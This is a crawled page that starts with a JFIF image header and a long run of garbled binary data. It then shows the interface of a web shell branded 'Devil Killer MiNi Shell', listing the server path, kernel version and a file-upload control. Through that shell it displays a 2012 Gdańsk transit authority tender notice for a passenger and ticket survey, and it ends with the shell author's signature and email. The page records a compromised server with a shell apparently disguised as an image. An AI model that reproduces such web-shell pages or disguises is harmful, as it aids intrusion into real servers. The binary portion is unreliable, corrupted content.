JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120322/66271-N-2012.html

<p class="kh_header"><b>Gdańsk: Badanie napełnienia pojazdów i struktury biletów posiadanych przez pasażerów linii komunikacyjnych obsługiwanych przez Zarząd Transportu Miejskiego w Gdańsku (ZTM) na terenie gmin ościennych</b><br>
<b>Numer ogłoszenia: 66271 - 2012; data zamieszczenia: 22.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Transportu Miejskiego , ul. Na Stoku 49, 80-874 Gdańsk, woj. pomorskie, tel. 058 3091323 do 25 w. 410, faks 058 3091323 w. 402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ztm.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Badanie napełnienia pojazdów i struktury biletów posiadanych przez pasażerów linii komunikacyjnych obsługiwanych przez Zarząd Transportu Miejskiego w Gdańsku (ZTM) na terenie gmin ościennych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem niniejszego postępowania o udzielenie zamówienia publicznego jest przeprowadzenie badań napełnienia pojazdów i - dla wskazanych kursów - struktury biletów posiadanych przez pasażerów linii komunikacyjnych obsługiwanych przez Zarząd Transportu Miejskiego w Gdańsku (ZTM) na terenie Gdańska i gmin ościennych, wprowadzenie danych z kart pomiarowych do arkusza kalkulacyjnego, opracowanie wyników oraz przedstawienie wyników w postaci papierowej i elektronicznej, zgodnie z załączonym wzorem - Załącznik nr 6 do SIWZ.

II. Opis badań napełnienia pojazdów i struktury biletów na terenie gmin ościennych obsługiwanych przez ZTM w Gdańsku :

1.	Przedmiotem postępowania o udzielenie zamówienia publicznego jest przeprowadzenie we wskazanych kursach:
a)	badań wielkości popytu na liniach komunikacyjnych,
b)	 dla części kursów na terenie gmin ościennych - struktury biletów posiadanych przez wszystkich pasażerów z uwzględnieniem osób uprawnionych do przejazdów bezpłatnych i ulgowych oraz gapowiczów,
c)	 wykorzystania biletów okresowych i czasowych na liniach obsługiwanych przez ZTM w gmi-nach ościennych (w zakresie i ilości określonej załącznikiem 6 do SIWZ) oraz wprowadzenie danych z kart pomiarowych do arkusza kalkulacyjnego, opracowanie wyników oraz przedsta-wienie wyników w postaci papierowej i elektronicznej, zgodnie z załączonym wzorem - Za-łącznik nr 6 do SIWZ.
2.	Badaniami objęte są linie komunikacyjne na terenie następujących gmin:
-Gmina Kolbudy (linie: 174, 255, 256),
-Miasto Pruszcz Gdański (linie: 205, 207, 232, N5),
-Gmina Pruszcz Gdański (linie: 112, N9) - na odcinku Bogatka - Przejazdowo,  
-Miasto Sopot (linie: N1),
-Gmina Żukowo (linie 126, 171)
-Miasto Gdańsk (linie N7, N9).
w zakresie ustalonym załącznikiem 6.
3.	Badania należy przeprowadzić w oparciu o rozkłady jazdy obowiązujące w dniu podpisania umowy. W przypadku zmian dotyczących rozkładu jazdy w okresie prowadzenia badań, Za-mawiający jest zobowiązany poinformować o nich Wykonawcę z minimum 5-dniowym wyprzedzeniem.
Szczegółowe dane określające kursy, w których należy przeprowadzić badania popytu oraz badania struktury biletów zawarte są w załączniku nr 6 do SIWZ.
Wykonawca przed rozpoczęciem badań otrzyma od Zamawiającego komplet szczegółowych rozkładów jazdy na wszystkie linie podlegające badaniu oraz komplet wzorów instrumentów badawczych (kart pomiarowych) obowiązujących na poszczególnych liniach.
4.	Badania należy przeprowadzić przy zastosowaniu następujących metod badawczych:
4.1.	 w badaniach popytu - metody obserwacji jawnej, standaryzowanej, niekontrolowanej,
4.2.	 w badaniach struktury biletów - metody wywiadu bezpośredniego z każdym pasażerem podróżującym w badanym kursie połączonego z kontrolą biletów. Dla linii 112 i N9 badaniem są objęci wyłącznie pasażerowie wsiadający lub wysiadający na odcinkach objętych badaniem.
	W przypadku pasażerów posiadających bilety w formie zapisu na karcie elektronicznej, do identyfikacji rodzaju i nominału biletów w badaniach, należy wykorzystać czytnik biletów, a odczytany bilet zanotować na karcie pomiarowej. Zamawiający udostępni Wykonawcy na okres badań 10 czytników kontrolerskich. Wykonawca musi je ubezpieczyć na czas korzystania (od kradzieży, zniszczenia, itp.) Wykonawca jest zobowiązany do zwrotu sprawnych czytników po zakończeniu badań. W przypadku nie zwrócenia czytnika lub zwrócenia go w stanie niezdatnym do użycia lub naprawy, Wykonawca zobowiązany jest do zakupu nowego czytnika. W przypadku pogorszenia stanu czytnika ponad zwykły stan zużycia Wykonawca będzie zobowiązany do poniesienia kosztów naprawy czytnika. W okresie trwania badań Wykonawca zobowiązany jest do udostępnienia Zamawiającemu wszystkich czytników wykorzystywanych w badaniach w celu pobrania przez Zamawiającego danych z przeprowadzonych badań. 
5.	Obserwatorzy, rejestratorzy i ankieterzy zobowiązani są do bezwzględnego przestrzegania zasad zawartych w instrukcji badań. Treść instrukcji zamieszczona jest w załączniku nr 9 do SIWZ. W przypadku stwierdzenia nie stosowania zasad zawartych w instrukcji, prowadzący  badania zobowiązany jest do powtórzenia całego dnia badań wynikającego z założonego harmonogramu bez prawa do dodatkowego wynagrodzenia.
6.	Badania popytu należy prowadzić zgodnie z kolejnością przystanków umieszczonych w kartach pomiaru zapełnienia.
7.	W badaniach struktury biletów - wyniki należy podać osobno dla każdego zbadanego kursu.
8.	Badania wykorzystania biletów okresowych i czasowych Wykonawca prowadzi w wybranych przez siebie kursach, z zachowaniem zasady pierwszeństwa realizacji ważności badań struktury (konieczność uzyskania danych dotyczących wszystkich pasażerów, a dla linii 112 i N9 - tylko pasażerów wsiadających lub wysiadających) i w minimalnej ilości określonej przez Zamawiającego dla poszczególnych gmin i dni w Załączniku 6.
	Badania wykorzystania biletów okresowych i czasowych realizowane są przez Wykonawcę w dowolnie wybranych przez niego kursach, z zastrzeżeniem konieczności realizacji wywiadów w ilości określonej Załącznikiem 6. Wykonawca powinien dążyć, aby wywiadem obejmowane były w pierwszym rzędzie osoby dysponujące biletem o rzadko występującym nominale (np. biletem 72h MZKZG).
9.	Obserwatorzy, rejestratorzy i ankieterzy są zobowiązani do rejestracji wszystkich badanych parametrów wyłącznie z wykorzystaniem instrumentów pomiarowych przygotowanych przez Zamawiającego.
	Wzory wykorzystywanych w badaniach instrumentów zawarte są w załączniku nr 10 do SIWZ.
10.	Każda linia powinna zostać zbadana osobno w dniu powszednim szkolnym, sobotę i niedzielę z pominięciem okresu 5-10.04.2012 oraz 27.04-07.05.2012, przy czym w piątki dopuszcza się realizowanie wyłącznie badań wykorzystania biletów okresowych i czasowych. Wskazane przez Zamawiającego kursy (o ile wskazanie takie ma miejsce) należy przebadać dwukrotnie (zob. załącznik 6).
11.	Wykonawca ma obowiązek wcześniejszego informowania Zamawiającego o wszystkich badanych kursach (w zakresie dnia prowadzenia badań, ich charakteru oraz kursów i numeru badanej linii) najpóźniej w terminie 2 dni roboczych przed realizacją badania oraz niezwłocznego informowania o zmianie badanego kursu lub odstąpieniu od badania z przyczyn leżących po je-go stronie. Zawiadomienie uznaje się za dokonane również za pomocą poczty elektronicznej na adres a.wloch@ztm.gda.pl. W przypadku braku zawiadomienia o przeprowadzeniu badania, jego przesunięciu lub rezygnacji z badania, Zamawiający zastrzega sobie prawo unieważnienia części badania, których zawiadomienie powinno dotyczyć, i jego powtórzenia na koszt Wykonawcy.
12.	Wykonawca zobowiązany jest do sukcesywnego dostarczania Zamawiającemu w ciągu 4 dni roboczych od przeprowadzenia uzgodnionej z Zamawiającym części badań (trwającej nie dłużej niż tydzień), wszystkich wypełnionych dotąd Kart rejestracji biletów wraz z Kartami napełnień pojazdów oraz pliku w formacie .xls, wypełnionego danymi z ww. kart. Zamawiający w ciągu 8 dni roboczych dokona weryfikacji dostarczonych materiałów. Jeżeli w wyniku weryfikacji, Zamawiający  stwierdzi ewidentne błędy, np. ilość pasażerów stwierdzona na podstawie kart napełnień odbiega od ilości biletów wykazanych w Kartach rejestracji biletów i Kwestionariuszach wykorzystania biletów, Wykonawca będzie zobowiązany do powtórzenia badania w zakwestionowanej części na własny koszt..
13.	Zamawiający zastrzega sobie prawo wykluczania z badań osób działających w imieniu i/lub na rzecz Wykonawcy, których postawa etyczna lub ilość popełnianych błędów stwarza zagrożenie dla rzetelności przeprowadzanych badań.
14. Badania należy wykonać od dnia podpisania umowy do 18.05.2012 r., natomiast dostarczenie raportu w formie pisemnej i elektronicznej (CD) powinno nastąpić do 31.05.2012 r.
15. WARTOŚĆ SZACUNKOWA ZAMÓWIENIA: 50 000 zł. netto.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.31.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni są udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie realizacji przynajmniej jednej usługi polegającej na wykonaniu badań marketingowych w podobnym zakresie jak w opisie przedmiotu zamówienia.,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, co do zakresu rzeczowego, terminu jej wykonania oraz związane ze zmianami organizacyjnymi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ztm.gda.pl/hmvc/index.php/sipinfo/przetargi_lista<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego  w Gdańsku, ul. Na Stoku 49, I piętro, pokój 106.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2012 godzina 12:00, miejsce: w siedzibie Zamawiającego  w Gdańsku, ul. Na Stoku 49, I piętro, pokój 112 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. termin otwarcia ofert : 30.03.2012r. o godzinie 12:15 w siedzibie Zamawiającego  w Gdańsku, ul. Na Stoku 49, IV piętro, pokój 418.
2.	Osobą uprawnioną do porozumiewania się z Wykonawcami jest w sprawach związanych z przedmiotem zamówienia: Izabela Ciechowska (58) 309-13-23 wew. 1061 W GODZ. 800 - 1400.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com